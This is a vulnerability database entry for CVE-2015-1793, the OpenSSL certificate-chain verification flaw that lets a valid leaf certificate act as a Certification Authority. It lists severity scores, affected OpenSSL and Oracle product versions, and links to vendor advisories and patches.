CVE-2015-1793

Severity

64%

Complexity

99%

Confidentiality

81%

The X509_verify_cert function in crypto/x509/x509_vfy.c in OpenSSL 1.0.1n, 1.0.1o, 1.0.2b, and 1.0.2c does not properly process X.509 Basic Constraints cA values during identification of alternative certificate chains, which allows remote attackers to spoof a Certification Authority role and trigger unintended certificate verifications via a valid leaf certificate.

The X509_verify_cert function in crypto/x509/x509_vfy.c in OpenSSL 1.0.1n, 1.0.1o, 1.0.2b, and 1.0.2c does not properly process X.509 Basic Constraints cA values during identification of alternative certificate chains, which allows remote attackers to spoof a Certification Authority role and trigger unintended certificate verifications via a valid leaf certificate.

CVSS 3.0 Base Score 6.5. CVSS Attack Vector: network. CVSS Attack Complexity: low. CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N).

CVSS 2.0 Base Score 6.4. CVSS Attack Vector: network. CVSS Attack Complexity: low. CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:N).

Overview

First reported 9 years ago

2015-07-09 19:17:00

Last updated 6 years ago

2018-11-30 21:30:00

Affected Software

Oracle Supply Chain Products Suite 6.1.2.2

6.1.2.2

Oracle Supply Chain Products Suite 6.1.3.0

6.1.3.0

Oracle Supply Chain Products Suite 6.2.0

6.2.0

Oracle JD Edwards EnterpriseOne Tools 9.1

9.1

Oracle JD Edwards EnterpriseOne Tools 9.2

9.2

OpenSSL Project OpenSSL 1.0.1n

1.0.1n

OpenSSL Project OpenSSL 1.0.1o

1.0.1o

OpenSSL Project OpenSSL 1.0.2b

1.0.2b

OpenSSL Project OpenSSL 1.0.2c

1.0.2c

References

http://fortiguard.com/advisory/2015-07-09-cve-2015-1793-openssl-alternative-chains-certificate-forgery

NetBSD-SA2015-008

http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10694

FEDORA-2015-11414

FEDORA-2015-11475

SSRT102180

HPSBGN03424

http://openssl.org/news/secadv_20150709.txt

Vendor Advisory

20150710 OpenSSL Alternative Chains Certificate Forgery Vulnerability (July 2015) Affecting Cisco Products

http://www.fortiguard.com/advisory/2015-07-09-cve-2015-1793-openssl-alternative-chains-certificate-forgery

http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html

Patch

http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html

http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html

http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

http://www.oracle.com/technetwork/topics/security/bulletinjul2015-2511963.html

http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html

Patch

http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html

Patch

75652

91787

1032817

SSA:2015-190-01

http://www1.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-454058.htm

https://git.openssl.org/?p=openssl.git;a=commit;h=9a0db453ba017ebcaccbee933ee6511a9ae4d1c8

Vendor Advisory

https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04822825

https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05045763

https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05184351

https://help.ecostruxureit.com/display/public/UADCO8x/StruxureWare+Data+Center+Operation+Software+Vulnerability+Fixes

https://kc.mcafee.com/corporate/index?page=content&id=SB10125

GLSA-201507-15

38640

FreeBSD-SA-15:12

Stay updated

ExploitPedia is constantly evolving. Sign up to receive a notification when we release additional functionality.

Get in touch

If you'd like to report a bug or have any suggestions for improvements then please do get in touch with us using this form. We will get back to you as soon as we can.